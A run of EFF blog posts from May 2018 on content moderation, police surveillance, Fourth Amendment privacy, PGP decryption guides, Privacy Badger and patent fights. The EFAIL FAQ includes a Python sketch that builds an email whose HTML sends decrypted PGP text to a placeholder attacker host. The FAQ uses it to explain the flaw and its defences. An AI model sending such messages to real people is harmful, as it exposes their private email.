Although Facebook's content enforcement report offers an unprecedented look into how the company adjudicates certain types of content, there's still much to be desired. The Santa Clara Principles offer guidance on other details that free speech advocates would like to see reported, such as the source of flagging (i.e., governments, users, trusted flaggers, and different types of automated systems).
Second, the report covers how the company deals with content that violates the rules, but fails to address how the company's moderators and automated systems can get the rules wrong, taking down content that doesn't actually violate the Community Standards. Now that Facebook has begun offering appeals, its next report could set a new standard by also including the number of appeals that resulted in content being restored. The report repeatedly refers to the company taking "action," but only clarifies what that means in a separate document linked from the report (for the record, it's a little better than it sounds: "taking action" might mean removing the content, disabling the account, or merely covering content with a warning). Furthermore, while the introduction to the report states that it will address how quickly the company takes action on a given item, it doesn't really do that, at least not in measure of time. Instead, that metric seems to refer to Facebook identifying and flagging content before users do, and even this metric is "not yet available."

Savvy readers will notice that in the report, Facebook conflates violations of its "authentic identity" rule with impersonation and other fake accounts. While the company notes that "[b]ad actors try to create fake accounts in large volumes automatically using scripts or bots," it would be useful to understand how many users are still being kicked off the service for more benign violations of the company's "authentic identity" policy, such as using a partial name, a performance name, or another persistent pseudonym. Finally, transparency isn't just about reports. Facebook still must become more accountable to its users, notifying them clearly when they violate a rule and demonstrating which rule was violated. Overall, Facebook's report (and YouTube's before it) is a step in the right direction, but advocates should continue to demand more.

California Bill Would Allow Elected Officials to Regulate and Veto Police Use of Military Spy Tech (Tue, 15 May 2018)
In recent years, protesters have come face to face with police forces that are increasingly well-equipped with battlefield surveillance technologies. That’s because U.S. police are getting more and more equipment from the U.S. military—including sophisticated surveillance equipment. The trend has led to disturbing scenes like those from 2014 protests against police shootings, in which peaceful protesters were confronted by law enforcement equipped with sophisticated military equipment. In California, a bill is moving forward that would rein in those acquisitions of military equipment, and restore frayed relationships between police and the communities they serve. A.B. 3131 would allow police to acquire military equipment only after the acquisition is approved by a relevant elected legislative body, with opportunity for public comment required. Typically, the governing body for a law enforcement agency will be a city council or county board of supervisors. These officials would also need to evaluate the threat to civil liberties posed by the technology, and create a use policy that is legally enforceable. According to recent data from the Department of Defense, California police agencies are already in possession of more than $136 million worth of military equipment, including thermal imaging equipment, drones, and “long-range acoustic devices,” which are a type of sonic weapon. The Obama administration placed restrictions on handouts of military equipment in 2015, but those limits were removed by the Trump administration last year. Community oversight is critical to responsible use of any surveillance technology, and that’s especially true of tools powerful enough to be used in a military setting. That’s why EFF is supporting A.B. 3131. “All too often, government officials unilaterally decide to adopt powerful new military and surveillance technologies that invade our privacy, chill our free speech, and unfairly burden communities of color,” explained Nathan Sheard, EFF Grassroots Organizer, in our letter [PDF] supporting the bill. We’d like California legislators to go even further, and insist on oversight for all police purchases of spying equipment. Another California bill we supported last year would have required this. So does a bill we support this year:  S.B. 1186. Spying tools used against foreign military adversaries shouldn’t be casually handed over to U.S. police. Once these tools are adopted locally, it’s hard to stop their use. It’s time to pass A.B. 3131 and other proposals that will put a stop to unchecked police surveillance.

The Supreme Court Says Your Expectation of Privacy Probably Shouldn't Depend on Fine Print (Tue, 15 May 2018)
The Supreme Court unanimously ruled yesterday in Byrd v. United States that the driver of a rental car could have a reasonable expectation of privacy in the car even though the rental agreement did not authorize him to drive it. We're pleased that the Court refused to let a private contract dictate Fourth Amendment rights in this case, and we hope it's instructive to other courts, particularly those confronted with the argument that terms of service undermine users' expectation of privacy in third-party email.

What Determines an Expectation of Privacy?

In Byrd, state troopers stopped Terrence Byrd while he was driving a rental car alone on a Pennsylvania interstate. Once the troopers realized he was not an authorized driver, they went ahead and searched the car, finding body armor and 49 bricks of heroin in the trunk. Byrd challenged the search on Fourth Amendment grounds, but both lower courts ruled that he did not have a Fourth Amendment interest in a car that he was not authorized by the rental company to drive. The Supreme Court disagreed.

The Court explained that as in any Fourth Amendment case, the starting point is to determine whether the individual has demonstrated a "reasonable expectation of privacy" in the place searched. Determining exactly what makes an expectation of privacy reasonable is notoriously difficult, but according to a 1978 case it "must have a source outside of the Fourth Amendment, either by reference to concepts of real or personal property law or to understandings that are recognized and permitted by society." When it comes to places like houses and cars, the Court has developed a kind of sliding scale: owners and those in lawful possession (like tenants) "almost always" have a reasonable expectation of privacy, while short-term visitors do not. It's not enough to simply happen to be somewhere in order to contest a search, but you don't have to have a strict property interest in the place either, since overnight guests can contest a police search.

Byrd falls somewhere in the middle of this sliding scale. The Court compared him to the defendant in a 1960 case called Jones v. United States—not to be confused with the 2012 Jones case regarding GPS tracking—in which the defendant was staying alone in an apartment rented by his friend and was allowed to contest an illegal search by the police. In both cases, the defendants were the sole occupants of the place searched, so they had "dominion and control" and the "right to exclude" others from it. In light of this, Justice Kennedy wrote that there was "no reason" that an expectation of privacy should depend on "whether the car in question is rented or privately owned by someone other than the person in current possession of it." As a result, the Court remanded for a determination of whether Byrd's possession of the car was lawful or whether he had a friend rent it as an illegal pretext.

Your Fourth Amendment Rights Shouldn't Come with Terms and Conditions

Perhaps the more interesting question in the case, however, was whether the Budget Rent a Car agreement that Byrd's friend signed before giving him the keys should have negated Byrd's expectation of privacy in the car. That agreement provided in capital letters that permitting an unauthorized driver to drive the car was a violation of the rental contract that could void its coverage. The government argued that this provision automatically nullified Byrd's expectation of privacy in the car.
Thankfully, the Supreme Court refused to go down this road. “As anyone who has rented a car knows, car-rental agreements are filled with long lists of restrictions,” including things like “driving the car on unpaved roads or driving while using a handheld cellphone. Few would contend that violating provisions like these has anything to do with a driver’s reasonable expectation of privacy in the rental car.” There might even be “innocuous” reasons to do something that voids the agreement, like allowing an unauthorized driver, such as when the official renter is too drunk to drive. At the end of the day, the Court wrote, rental agreements concern “risk allocation between private parties,” not someone’s expectation of privacy. This is an encouraging result, especially because we’ve seen the government argue that private contracts—specifically email providers’ terms of service—should inform users’ expectations of privacy. In a case currently in front of the Tenth Circuit Court of Appeals, United States v. Ackerman, in which EFF recently filed an amicus brief, the district court held that when AOL terminated the defendant’s account pursuant to its TOS, it extinguished his expectation of privacy. In fact, the court wrote that the TOS itself “limited his expectation of privacy” because it “alerted Defendant that he was not to participate or engage in illegal activity.”  As we argued in Ackerman, terms of service should not determine expectations of privacy for the very reason that Justice Kennedy pointed to in Byrd—they are fundamentally contracts (of adhesion) between private parties, not the sort of thing that should dictate our privacy in relation to the government. As in rental car agreements, email providers’ TOS nearly always prohibit a wide range of behavior and allow the provider to unilaterally void the agreement. But just as with mail and telephone service, millions of Americans rely on the privacy of email and electronic communications even though they are facilitated by intermediaries, and the Fourth Amendment indisputably protects these communications. While the Fourth Amendment’s application to email and the Internet cannot be mechanically compared to the law of traffic stops and apartment searches, we hope that other courts follow the Supreme Court’s firm rejection of the government’s terms-and-conditions-may-apply arguments in Byrd.
>> mehr lesen

Pretty Good Procedures for Protecting Your Email (Di, 15 Mai 2018)
A group of researchers recently released a paper that describes a new class of serious vulnerabilities in the popular encryption standard PGP (including GPG) as implemented in email clients. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email. See EFF’s analysis and FAQ for more detail. Our current recommendation is to disable PGP integration in email clients. This is the number one thing you can do to protect your past messages, and prevent future messages that you receive from being read by an attacker. You should also encourage your contacts to do the same.
Disabling PGP integration for Thunderbird
Disabling PGP integration for Apple Mail
Disabling PGP integration for Outlook
If you have old emails you need to access, the next thing you can do is save old emails to be decrypted on the command line.
Exporting PGP-encrypted email from Thunderbird
Exporting PGP-encrypted email from Apple Mail
Exporting PGP-encrypted email from Outlook
Methods for reading encrypted email on the command line vary between operating systems, so separate instructions are needed. The instructions linked above for disabling the plugin from your mail client leave your PGP keyring in place, so you will use the same passphrase when prompted.
Using the command line to decrypt a message for Windows
Using the command line to decrypt a message for macOS
Using the command line to decrypt a message for Linux
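All three command-line guides boil down to the same gpg -d invocation on the file you exported. As a rough, cross-platform illustration only (it is not part of the guides above), the sketch below assumes GnuPG is installed and on your PATH and that the exported message was saved as "encrypted.eml" on your Desktop:

    # A minimal sketch, assuming GnuPG is installed and on the PATH and that the
    # exported message was saved as "encrypted.eml" on the Desktop. It simply
    # shells out to the same "gpg -d" command the guides describe.
    import pathlib
    import subprocess

    saved_message = pathlib.Path.home() / "Desktop" / "encrypted.eml"

    # gpg prompts for the passphrase itself (via its agent) if one is needed,
    # then writes the decrypted message to standard output.
    result = subprocess.run(
        ["gpg", "-d", str(saved_message)],
        capture_output=True,
        text=True,
    )
    print(result.stdout)

Typing the plain gpg -d command in a terminal, as the per-platform guides below describe, accomplishes exactly the same thing.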
>> mehr lesen

Using the Command Line to Decrypt a Message on Linux (Di, 15 Mai 2018)
If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL. Note that the first steps (opening the terminal) will vary between desktop environments. 1. Open the Activities view by clicking all the way in the top left corner of your screen. 2. Type “terminal” into the search bar, and press Enter. This will open the command prompt. 3. Type “cd Desktop” to go to your desktop. Mind the capital ‘D’! 4. Type “gpg -d encrypted.eml” using the name of the file you saved earlier. This may prompt you for your PGP passphrase depending on your configuration and recent usage, and will output the full email in the terminal window. These notes are based on Ubuntu Desktop with GNOME 3.
>> mehr lesen

PGP and EFAIL: Frequently Asked Questions (Di, 15 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email, and theorized many more which others could build upon. For users who have few—or even no—alternatives for end-to-end encryption, news of these vulnerabilities may leave many questions unanswered. Digital security trainers, whistleblowers, journalists, activists, cryptographers, industry, and nonprofit organizations have relied on PGP for 27 years as a way to protect email communications from eavesdroppers and ensure the authenticity of messages. If you’re like us, you likely have recommended PGP as an end-to-end encrypted email solution in workshops, trainings, guides, cryptoparties, and keysigning parties. It can be hard to imagine a workflow without PGP once you’ve taken the time to learn it and incorporate it in your communications. We’ve attempted to answer some important questions about the current state of PGP email security below. Who is affected, and why should I care? Is disabling HTML sufficient? I use software that is verified with a PGP signature. Can it be trusted? What are the vulnerabilities? What does the paper say about my email client? But I use [insert email software here] and it’s not on the affected list. Should I care? Does this mean PGP is broken? What should I do about PGP software on my computer? Can my previous emails be read by an attacker? What if I keep getting PGP emails? Going forward, what should I look out for? Is there a replacement for sending end-to-end encrypted messages? I don’t have other end-to-end encrypted messaging options available. PGP is my only option. Can I still use it? I don’t want to use the command line. Surely there’s a usable alternative. Can’t you recommend something else? I only use PGP in the command line. Am I affected? Who is affected, and why should I care? Since PGP is used as a communication tool, sending messages to others with unpatched clients puts your messages at risk, too. Sending PGP messages to others also increases the risk that they will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them. Balancing the risks of continuing to use PGP can be tricky, and will depend heavily on your own situation and that of your contacts. Is disabling HTML sufficient? Turning off sending HTML email will not prevent this attack. For some published attacks, turning off viewing HTML email may protect your messages from being leaked to an attacker by your own client. However, since PGP email is encrypted to both the sender and each recipient, it will not protect these messages from being leaked by anyone else you’ve communicated with. Additionally, turning off HTML email may not protect these messages against future attacks that build on the current vulnerabilities. Turning off reading HTML email while still sending PGP-encrypted messages encourages others to read these with their own potentially vulnerable clients. This promotes an ecosystem that puts the contents of these messages (as well as any past messages that are decrypted by them) at risk. I use software that is verified with a PGP signature. Can it be trusted? Yes! Verifying software signed with PGP is not vulnerable to this class of attack. Package management systems enforcing signature verification (as some Linux distributions do) are also unaffected. What are the vulnerabilities? 
There are two attacks of concern demonstrated by the researchers: 1. “Direct exfiltration” attack: This takes advantage of the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. (A sketch of this message structure appears at the end of this FAQ.) 2. Ciphertext modification attack: The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously obtained encrypted email. This second vulnerability takes advantage of the combination of OpenPGP’s lack of mandatory integrity verification and the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check fails. Since the OpenPGP standard did not specify what to do if the integrity check fails, some software incorrectly displays the message anyway, enabling this attack. Furthermore, this style of attack, if paired with an appropriate exfiltration channel, may not be limited to HTML-formatted email. We have more detail about the specifics of the vulnerabilities and details on mitigations. What does the paper say about my email client? Some email clients are impacted more than others, and the teams behind those clients are actively working on mitigating the risks presented. The paper describes both direct exfiltration (table 4, page 11) and backchannels (table 5, page 20) for major email clients. Even if your client has patched current vulnerabilities, new attacks may follow. But I use [insert email software here] and it’s not on the affected list. Should I care? While you may not be directly affected, the other participants in your encrypted conversations may be. For this attack, it isn’t important whether the sender or any receiver of the original secret message is targeted. This is because a PGP message is encrypted to each of their keys. Sending PGP messages to others also increases the risk that your recipients will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them. Does this mean PGP is broken? The weaknesses in the underlying OpenPGP standard (specifically, OpenPGP’s lack of mandatory integrity verification) enable one of the attacks given in the paper. Despite its pre-existing weaknesses, OpenPGP can still be used reliably within certain constraints. When using PGP to encrypt or decrypt files at rest, or to verify software with strict signature checking, PGP still behaves according to expectation. OpenPGP also uses underlying cryptographic primitives such as SHA-1 that are no longer considered safe, lacks the benefits of Authenticated Encryption (AE), and allows signatures to be trivially stripped from messages. 
In time, newer standards will have to be developed which address these more fundamental problems in the specification. Unfortunately, introducing authenticated encryption without also rotating keys to strictly enforce usage constraints will make OpenPGP susceptible to backwards-compatibility attacks. This will have to be addressed in any future standard. In short, OpenPGP can be trusted to a certain degree. For long-term security of sensitive communications, we suggest you migrate to another end-to-end encrypted platform. What should I do about PGP software on my computer? In general, keeping PGP (or GPG) on your system should be safe from the known exploits, provided that it is disconnected from email as described above. Some Linux systems depend on GPG for software verification, and PGP is still useful for manually verifying software. Uninstalling your PGP software may also make your keys inaccessible and prevent you from decrypting past messages in some instances. Can my previous emails be read by an attacker? If the PGP-encrypted contents of previous emails are sent to you in new emails using this attack and you open that email in an unpatched email client with PGP software enabled, then yes. For viewing your archive of encrypted emails, we recommend using the command line. What if I keep getting PGP emails? You can decrypt these emails via the command line. If you prefer not to, notify your contacts that PGP is, for the time being, no longer safe to use in email clients and decide whether the conversation can continue over another end-to-end encrypted platform, such as Signal. Going forward, what should I look out for? We will be following this issue closely in the coming weeks. Authors of email clients and PGP plugins are working actively to patch this vulnerability, so you should expect updates soon. For the latest updates, you can follow https://sec.eff.org/blog or https://www.eff.org/issues/security. Is there a replacement for sending end-to-end encrypted messages? There is no secure, vetted replacement for PGP in email. There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives. I don’t have other end-to-end encrypted messaging options available. PGP is my only option. Can I still use it? Unfortunately, we cannot recommend using PGP in email clients until they have been patched, both on your device and your recipient’s device. The timeline for these patches varies from client to client. We recommend disconnecting PGP from your email client until the appropriate mitigations have been released. Stay tuned to https://sec.eff.org/blog or https://www.eff.org/issues/security for more info. I don’t want to use the command line. Surely there’s a usable alternative. Can’t you recommend something else? It’s very difficult to assess new software configurations in such a short timeframe. Some email clients are more vulnerable to this attack than others. However, using even the less vulnerable clients can have the effect of putting others at risk. We suggest decrypting archived emails with the command line, and moving to another end-to-end encrypted platform for conversations, at least until we are confident that the PGP email ecosystem has been restored to its previous level of security. I only use PGP in the command line. Am I affected? Yes and no. 
As we currently understand it, if you are using PGP solely for file encryption, without email, there are no known exfiltration channels to send the file contents to an attacker. However, the contents may still have been modified in transit in a way that you won’t necessarily be able to see, depending on how the implementer of the specific PGP software chose to do things. This is due to the integrity downgrade aspect of the vulnerability. Additionally, if you are using PGP to encrypt a message sent over email and your recipient uses a vulnerable email client, your correspondence is at risk of decryption. As it’s likely that many people use an email client to access PGP-encrypted emails, it’s important to confirm with your recipients that they have also disabled PGP in their email clients, or are using an unaffected client. If you must continue sensitive correspondences, we highly recommend switching to a vetted end-to-end encryption tool.
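To make the “direct exfiltration” attack described above more concrete, here is a minimal sketch of the message structure involved, using Python’s standard email library. It is an illustration of the shape of the attack only, not a working exploit: "attacker.example" and the ciphertext block are placeholders, nothing here decrypts anything, and whether a given client actually decrypts the middle part and renders the three parts as one HTML document depends on the client and its patch level.

    # Illustrative only: the shape of a "direct exfiltration" message. The
    # attacker sandwiches a previously captured PGP-encrypted part between two
    # HTML parts. A vulnerable client decrypts the middle part and renders all
    # three parts as a single HTML document, so the plaintext becomes part of
    # the image URL and is sent to attacker.example (a placeholder) when the
    # "image" is fetched.
    from email.mime.multipart import MIMEMultipart
    from email.mime.text import MIMEText

    captured_ciphertext = (
        "-----BEGIN PGP MESSAGE-----\n"
        "...previously intercepted ciphertext goes here...\n"
        "-----END PGP MESSAGE-----\n"
    )

    msg = MIMEMultipart("mixed")
    msg["To"] = "victim@example.com"
    msg["Subject"] = "EFAIL message-structure sketch"

    msg.attach(MIMEText('<img src="http://attacker.example/', "html"))
    msg.attach(MIMEText(captured_ciphertext, "plain"))
    msg.attach(MIMEText('">', "html"))

    print(msg.as_string())

Note that the attack relies entirely on the victim’s own client doing the decryption and then letting the decrypted content bleed into attacker-controlled HTML; that is exactly the behavior the client-side mitigations aim to remove.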
>> mehr lesen

Using the Command Line to Decrypt a Message on Windows (Di, 15 Mai 2018)
If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL. 1. Open the start menu by clicking the “Windows” icon in the bottom-left corner of the screen or pressing the “Windows” key on your keyboard. 2. Next, type “cmd” in the start menu that appears, and then press the “Enter” key. 3. You will now see a “Command Prompt” window appear. 4. Type exactly “cd Desktop”, then hit the “Enter” key. 5. Type the following text exactly: “gpg -d encrypted.eml”, then hit the “Enter” key. Outlook users should type exactly “gpg -d encrypted.asc” instead. 6. You will now be prompted to enter your GPG passphrase. Type it into the dialog, which may look different for Enigmail users, then hit the “Enter” key. 7. You should now see the contents of the message in the Command Prompt window. These notes are based on Windows 10 with Gpg4win.
>> mehr lesen

Using the Command Line to Decrypt a Message on macOS (Di, 15 Mai 2018)
If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL. 1. Open Finder (the blue smiley face icon) from the dock. 2. Click Applications on the left side of the window. 3. Scroll down and double-click the Utilities folder. 4. Double-click Terminal to open the command line. 5. Type “cd Desktop” and hit Enter to go to your desktop. Mind the capital ‘D’! 6. Type “gpg -d encrypted.eml”. (Note, if you named your file something else, you can swap it with the “encrypted.eml” text. Be mindful of capitalization and spelling!) 7. This will prompt you for your PGP passphrase and output the full email in the terminal window. Note that attachments and emoji will not render using this method, and it will be in plaintext. Email headers will be visible, as well as the PGP signature.
>> mehr lesen

Exporting PGP-Encrypted Email From Outlook (Di, 15 Mai 2018)
After disabling the GpgOL plugin, you will need to save encrypted messages as files on your hard drive in order to view them later on. 1. Select the encrypted message. 2. Right-click the file ending in “.asc”, then click “Save As.” 3. Click on “Desktop” to choose where you will save the file. Type “encrypted” for the filename, and click “Save.” For certain older PGP messages (PGP Inline), you will not see files to download. These steps may have to be altered for those messages. For instructions on reading the saved file, see Using the Command Line to Decrypt a Message on Windows. These notes are based on Outlook 2016 and Windows 10.
>> mehr lesen

Exporting PGP-Encrypted Email From Apple Mail (Di, 15 Mai 2018)
After disabling the GPGTools plugin for Apple Mail, you will need to save encrypted messages as files on your hard drive in order to view them later on. 1. Select the encrypted message. (Note: If you have followed the instructions for how to disable GPG in Apple Mail correctly, you will see the still-encrypted message instead of seeing the email with a note that it was decrypted.) 2. Click the “View” menu in the menu bar on the top of the screen, and select “Message”, and then select “Raw Source.” 3. The Raw Source of the email will open in a new window. You will be able to see the email headers, as well as the encrypted message. The full encrypted message will be bookended by “-----BEGIN PGP MESSAGE-----” and “-----END PGP MESSAGE-----”. This whole block, from the first hyphen before BEGIN to the last hyphen after END, is the encrypted message. 4. To save this email as a file, click the “File” menu in the menu bar on the top of the screen, and select “Save As...” 5. Select Desktop in the “Where” drop-down to make it easier to follow along. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make it easier to follow along with our command-line reading tutorial. 6. Once you hit “Save”, the file should appear on your Desktop, as selected in step 5. (Note: Your macOS Desktop may hide the file extension. The file extension is “.eml”.) For instructions on reading the saved .eml file, see Using the Command Line to Decrypt a Message on macOS.
>> mehr lesen

Exporting PGP-Encrypted Email From Thunderbird (Di, 15 Mai 2018)
After disabling Enigmail, you will need to save encrypted messages as files on your hard drive in order to view them later on. These instructions will work on most desktop operating systems. 1. Select the encrypted message. 2. Click on the hamburger menu (the three horizontal lines). 3. Hover over “Save As” on the left side of the menu pop-up. 4. Click on “File.” 5. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make the command-line step easier. 6. You can place this anywhere on your hard drive that makes the most sense to you, but to simplify following along in our command-line decryption tutorials, we suggest saving on the Desktop. For instructions on reading the saved .eml file, follow the link below that matches your operating system. How to read PGP-encrypted email on the command line: Windows macOS Linux
>> mehr lesen

Privacy Badger Rolls Out New Ways to Fight Facebook Tracking (Di, 15 Mai 2018)
On Thursday, EFF released a new version of Privacy Badger featuring a new, experimental way to protect your privacy on—and crucially, off—Facebook. It specifically targets link tracking, Facebook’s practice of following you whenever you click on a link to leave facebook.com. Download Privacy Badger What is link tracking? Say your friend shares an article from EFF’s website on Facebook, and you’re interested. You click on the hyperlink, your browser opens a new tab, and Facebook is no longer a part of the equation. Right? Not exactly. Facebook—and many other companies, including Google and Twitter—use a variation of a technique called link shimming to track the links you click on their sites. When your friend posts a link to eff.org on Facebook, the website will “wrap” it in a URL that actually points to facebook.com: something like https://l.facebook.com/l.php?u=https%3A%2F%2Feff.org%2Fpb&h=ATPY93_4krP8Xwq6wg9XMEo_JHFVAh95wWm5awfXqrCAMQSH1TaWX6znA4wvKX8pNIHbWj3nW7M4F-ZGv3yyjHB_vRMRfq4_BgXDIcGEhwYvFgE7prU. This is a link shim; a short sketch at the end of this post shows how the real destination is tucked inside it. When you click on that monstrosity, your browser first makes a request to Facebook with information about who you are, where you are coming from, and where you are navigating to. Then, Facebook quickly redirects you to the place you actually wanted to go. That’s just how basic link shimming works. Facebook’s approach is a bit sneakier. When the site first loads in your browser, all normal URLs are replaced with their l.facebook.com shim equivalents. But as soon as you hover over a URL, a piece of code fires that replaces the link shim with the actual link you wanted to see: that way, the link looks innocuous when you hover over it. The link shim is stored in an invisible HTML attribute behind the scenes. The new link takes you to where you want to go, but when you click on it, another piece of code fires off a request to l.facebook.com in the background—tracking you just the same. Privacy Badger to the rescue To combat this, the latest version of Privacy Badger finds all new link shims as they’re added to the page, replaces them with their "unwrapped" equivalents, and blocks the tracking code that would run when you hover over or click on them. We owe special thanks to Michael Ziminsky, whose code for the extension Facebook Tracking & Ad Removal formed the basis for this feature. Privacy Badger already blocks third-party trackers. But Facebook performs a tremendous amount of first-party tracking as well—logging your browsing habits when you’re on facebook.com or using their mobile app. Some of that is consensual. When you decide to “like” a post or leave a comment, you are voluntarily sharing information with Facebook and with your friends. Facebook has legitimate uses for that information that serve you, the user. But much of it, like link tracking, happens without your knowledge or consent. That’s where we hope Privacy Badger can make a difference. According to Facebook's official post on the subject, in addition to helping Facebook track you, link shims are intended to protect users from links that are "spammy or malicious." The post states that Facebook can use click-time detection to save users from visiting malicious sites. However, since we found that link shims are replaced with their unwrapped equivalents before you have a chance to click on them, Facebook's system can't actually protect you in the way they describe. 
Facebook also claims that link shims "protect privacy" by obfuscating the HTTP Referer header. With this update, Privacy Badger removes the Referer header from links on facebook.com altogether, protecting your privacy even more than Facebook's system claimed to. Privacy Badger has been performing link unwrapping on Twitter, which uses “t.co/...” shim links, for some time. And Privacy Badger already blocks many of the ways Facebook tracks you around the web, including "like" buttons and third-party cookies. More to come This update is our first foray into blocking first-party trackers on Facebook. We’ve noticed that some tracking still occurs in Firefox when users click on links with the middle and right mouse buttons, and we’ve just scratched the surface of the behind-the-scenes tracking Facebook actually does. In the coming months, we’ll continue investigating the kinds of tracking that Facebook, Google, Twitter, and others do on their own sites to see where it makes sense for Privacy Badger to get involved. We’ll keep you updated on our progress. In the meantime, if you’re a developer and would like to help, check us out on Github. And if you haven’t yet, be sure to install Privacy Badger!
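To make the wrapping concrete, here is a minimal sketch (in Python, purely for illustration; Privacy Badger itself is a browser extension written in JavaScript) of what "unwrapping" a link shim amounts to. The real destination travels in the shim’s "u" query parameter; the "h" value is an opaque token, shortened here for readability.

    # A minimal sketch, not Privacy Badger's actual code: the real destination
    # of a Facebook link shim is carried in its "u" query parameter.
    from urllib.parse import parse_qs, urlparse

    # The "h" token is truncated here for readability.
    shim = "https://l.facebook.com/l.php?u=https%3A%2F%2Feff.org%2Fpb&h=ATPY93"

    def unwrap(url: str) -> str:
        parsed = urlparse(url)
        if parsed.netloc == "l.facebook.com" and parsed.path == "/l.php":
            target = parse_qs(parsed.query).get("u")
            if target:
                return target[0]  # parse_qs already percent-decodes the value
        return url

    print(unwrap(shim))  # https://eff.org/pb

Privacy Badger performs this kind of replacement in the page itself as shims are added, and also blocks the background request to l.facebook.com that would otherwise fire when you hover over or click a link.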
>> mehr lesen

EFF Wins Final Victory Over Podcasting Patent (Mo, 14 Mai 2018)
Back in early 2013, the podcasting community was freaking out. A patent troll called Personal Audio LLC had sued comedian Adam Carolla and was threatening a bunch of smaller podcasters. Personal Audio claimed that the podcasters infringed U.S. Patent 8,112,504, which claims a “system for disseminating media content” in serialized episodes. EFF challenged the podcasting patent at the Patent Office in October 2013. We won that proceeding, and it was affirmed on appeal. Today, the Supreme Court rejected Personal Audio’s petition for review. The case is finally over. We won this victory with the support of our community. More than one thousand people donated to EFF’s Save Podcasting campaign. We also asked the public to help us find prior art. We filed an inter partes review (IPR) petition that showed Personal Audio did not invent anything new, and that other people were podcasting years before Personal Audio first applied for a patent. Meanwhile, Adam Carolla fought Personal Audio in federal court in the Eastern District of Texas. He also raised money for his defense and was eventually able to convince Personal Audio to walk away. When the settlement was announced, Personal Audio suggested that it would no longer sue small podcasters. That gave podcasters some comfort. But the settlement did not invalidate the patent. In April 2015, EFF won at the Patent Office. The Patent Trial and Appeal Board (PTAB) invalidated all the challenged claims of the podcasting patent, finding that it should not have been issued in light of two earlier publications, one relating to CNN news clips and one relating to CBC online radio broadcasting. Personal Audio appealed that decision to the Federal Circuit. The podcasting patent expired in October 2016, while the case was on appeal before the Federal Circuit. But that wouldn’t save podcasters who were active before the patent expired. The statute of limitations in patent cases is six years. If it could salvage its patent claims, Personal Audio could still sue for damages for years of podcasting done before the patent expired. On August 7, 2017, the Federal Circuit affirmed the PTAB’s ruling invalidating all challenged claims. After this defeat, Personal Audio tried to get the Supreme Court to take its case. It argued that the IPR process is unconstitutional, raising arguments identical to those presented in the Oil States case. The Supreme Court rejected those arguments in its Oil States decision, issued last month. Personal Audio also argued that EFF should be bound by a jury verdict in a case between Personal Audio and CBS—an argument which made no sense, because that case involved different prior art and EFF was not a party. Today, the Supreme Court issued an order denying Personal Audio’s petition for certiorari. With that ruling, the PTAB’s decision is now final and the patent claims Personal Audio asserted against podcasters are no longer valid. We thank everyone who supported EFF’s Save Podcasting campaign.  Related Cases:  EFF v. Personal Audio LLC
>> mehr lesen

The FBI Supposedly Has 7,775 Un-hackable Phones. We’re Asking for Proof (Mo, 14 Mai 2018)
EFF sent a Freedom of Information Act (FOIA) request to the FBI and other Department of Justice agencies to get some straight answers about approximately 7,800 supposedly un-hackable cellphones. Law enforcement agencies say they have a problem–criminals all use encrypted devices, making those devices inaccessible to law enforcement. They call this the “Going Dark” problem, saying that modern encryption is so good that all the criminals in the world are “going dark” to government surveillance. To stop this, these agencies are clamoring for laws that would mandate that backdoors be placed in encryption algorithms to allow for law enforcement access. EFF is very concerned about these efforts to introduce backdoors into encryption, because as we’ve said, there’s no such thing as a safe backdoor. Any backdoor in encryption can be just as easily used by bad actors as by law enforcement if it gets leaked, and once a hard-coded backdoor is discovered, it often can’t be closed. Nevertheless, law enforcement leaders continue to argue that they will be helpless without these backdoors. In particular, FBI Director Christopher Wray has repeatedly [.pdf] claimed that the FBI failed to break the encryption of 7,775 mobile devices during the 2017 fiscal year. This number sure is interesting, since we know that the FBI was able to get into the iPhone of the San Bernardino shooter without forcing Apple to help them do it, and we know that companies like Cellebrite and Grayshift sell access to iPhones for a few thousand dollars each. If these companies are actively providing their products to law enforcement, and have been doing so for years, where does Wray find 7,775 devices the FBI cannot hack? To find out, we have submitted a FOIA request to the FBI, as well as the Offices of the Inspector General and Information Policy at DoJ. Among other things, we are asking the FBI to tell the public how they arrived at that 7,775 devices figure, when and how the FBI discovered that some outside entity was capable of hacking the San Bernardino iPhone, and what the FBI was telling Congress about its capabilities to hack into cellphones. When law enforcement argues for legally mandating encryption backdoors into our devices, and justifies that argument by claiming they can’t get in any other way, it’s important for legislators and the public to know whether that justification is actually true.
>> mehr lesen

EFF Presents John Scalzi's Science Fiction Story About Our Right to Repair Petition to the Copyright Office (Mo, 14 Mai 2018)
